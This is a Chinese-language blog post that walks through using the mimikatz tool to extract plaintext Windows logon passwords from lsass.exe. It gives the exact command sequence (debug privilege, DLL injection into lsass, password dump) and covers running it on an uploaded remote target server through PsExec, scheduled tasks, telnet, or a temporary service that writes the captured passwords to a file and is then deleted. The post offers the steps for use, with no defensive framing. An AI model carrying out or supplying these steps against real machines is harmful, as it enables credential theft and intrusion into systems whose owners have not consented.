昨天弄了下OphCrack,一個破解windows密碼的玩意,順帶想起了這個神器,mimikatz,本人首創中文譯名為:咪咪卡住,不要笑,這是很嚴肅的名字。
咪咪卡住的下載地址:
mimikat是一個法國人寫的輕量級調試器,因為牛逼,所以成了神器。神器之所以出名了,是因為神器可以直接從lsass.exe 裡獲取windows處於active狀態賬號明文密碼,是很強大的。下面看看從我的Win7 64位上面抓密碼。進入咪咪卡住的目錄,
|
1
2
3
4
5
6
7
8
|
//開始運行神器mimikatz//提升權限privilege::debug//注入dllinject::process lsass.exe sekurlsa.dll//抓取密碼@getLogonPasswords |
不管密碼多麼複雜都能抓出來
作者的回答的原因是,在llsass中,明文密碼經過加密算法的密文 (這個加密算法是可逆的 能被解密出明文)
這個咪咪卡住啦,支持
|
1
2
3
4
5
6
|
Windows XP (部分可以)Windows Server 2003Windows Server 2008Windows VistaWindows 7Windows 7 SP1 |
在遠程終端(3389、mstsc.exe
通常你在遠程終端中運行該程序會提示:存儲空間不足,無法處理此命令。
這是因為在終端模式下,不能插入遠線程,跨會話不能注入,你需要使用如下方法執行該程序:
首先提取幾個文件,只抓取密碼的話,只需要這幾個文件:
|
1
2
3
|
mimikatz_trunk\tools\PsExec.exemimikatz_trunk\Win32\mimikatz.exemimikatz_trunk\Win32\sekurlsa.dll |
打包後上傳至目標服務器,然後解壓釋放,注意路徑中絕對不能有中文(可以有空格)!否則加載DLL的時候會報錯:找不到文件。
然後使用以下任何一種方法即可抓取密碼:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
//最簡單實用的方法,使用 PsExec.exe 啟動。//在系統帳戶中運行 cmd.exe,或者直接運行 mimikatz.exepsexec -s cmd.exe//啟動 mimikatz.exeC:\mimikatz_trunk\Win32\mimikatz.exe//提升權限privilege::debug//注入dll,要用絕對路徑!並且路徑中絕對不能有中文(可以有空格)!inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"//抓取密碼@getLogonPasswords//退出,不要用 ctrl + c,會導致 mimikatz.exe CPU 佔用達到 100%,死循環。exit//*********************************************************//使用 At 啟動at ***//*********************************************************//創建服務方法sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"sc start getpasswordsc delete getpassword//*********************************************************//telnet 遠程命令管道telnet **** |
文章標籤
全站熱搜


